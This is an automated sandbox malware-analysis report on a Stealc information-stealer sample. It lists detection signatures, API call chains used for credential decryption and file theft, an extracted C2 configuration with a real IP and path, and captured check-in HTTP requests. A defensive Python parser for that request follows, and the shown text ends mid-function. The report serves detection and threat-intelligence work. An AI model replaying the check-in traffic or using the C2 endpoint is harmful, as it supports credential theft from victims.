Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561767
MD5: 25fa991e349149a46f237995246dcac2
SHA1: 581f619ac0a4f4f6e995e14a419b3a5d5e50bbcf
SHA256: 6a076f8ee05524ec960150149ced7df5c5953f6fe04de4fada9c5d3439552eb5
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3992 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 25FA991E349149A46F237995246DCAC2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 3992 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 3992 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched
Suricata alerts (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
2024-11-24T08:46:06.690752+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6:49708 | 185.215.113.206:80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phps0_ | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpk1G | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpC0o | Avira URL Cloud: Label: malware
Source: file.exe.3992.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | Virustotal: Detection: 49%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_006D4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_006D60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006F40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_006E6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_006DEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_006E6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_006D9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_006D9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_006D7750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_006E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_006EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D16B9

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49708 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 33 30 46 32 42 37 37 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a
  Data Ascii: ------GHJDGDBFCBKFHJKFHCBK\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nF730F2B77D8C1730677652\r\n------GHJDGDBFCBKFHJKFHCBK\r\nContent-Disposition: form-data; name="build"\r\n\r\nmars\r\n------GHJDGDBFCBKFHJKFHCBK--\r\n
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 8 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache (no User-Agent header)
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache (no User-Agent header; Data Raw and Data Ascii identical to the POST listed above)
Source: file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206-
Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001039000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2220139315.0000000001039000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/0
Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001045000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC0o
Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpk1G
Source: file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phps0_
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop
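The two requests above are the Stealc check-in that Suricata rule 2044243 fired on: a bare GET / followed by a multipart POST that carries only an hwid and a build field, sends no User-Agent header, and whose build value equals the Botnet string in the extracted configuration. The Python below is an added example and not part of the Joe Sandbox report: it decodes the report's own Data Raw hex dump, parses the multipart body, and applies the check-in heuristics just described. The boundary-shape check is an assumption drawn from this single capture, not a documented Stealc constant, and the code is a triage helper, not the Suricata rule itself.

```python
import re

# Request headers exactly as recorded in the report's HTTP capture. There is no
# User-Agent header; the report flags that absence as its own signature.
CHECKIN_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK",
    "Host": "185.215.113.206",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}

# "Data Raw" hex dump of the POST body, copied from the report.
CHECKIN_BODY_HEX = (
    "2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 "
    "4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 "
    "65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a "
    "20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 "
    "3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 33 30 46 "
    "32 42 37 37 44 38 43 31 37 33 30 36 37 37 36 35 "
    "32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 "
    "46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 "
    "6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 "
    "6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e "
    "61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d "
    "61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 "
    "44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d "
    "2d 0d 0a"
)
CHECKIN_BODY = bytes.fromhex(CHECKIN_BODY_HEX)

# "Botnet" value from the configuration the report extracted from memory.
CONFIG_BOTNET = "mars"


def boundary_from_content_type(content_type: str) -> str:
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(2)


def parse_multipart_fields(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for the text parts of a multipart/form-data body."""
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":            # preamble or the closing "--" marker
            continue
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode("ascii")] = value.decode("utf-8", "replace")
    return fields


def checkin_indicators(headers: dict, body: bytes, config_botnet: str = "") -> list:
    """Heuristics for the check-in shape seen in this capture; not a Suricata rule."""
    findings = []
    lowered = {k.lower(): v for k, v in headers.items()}
    if "user-agent" not in lowered:
        findings.append("no User-Agent header")
    declared = int(lowered.get("content-length", "-1"))
    if declared != len(body):
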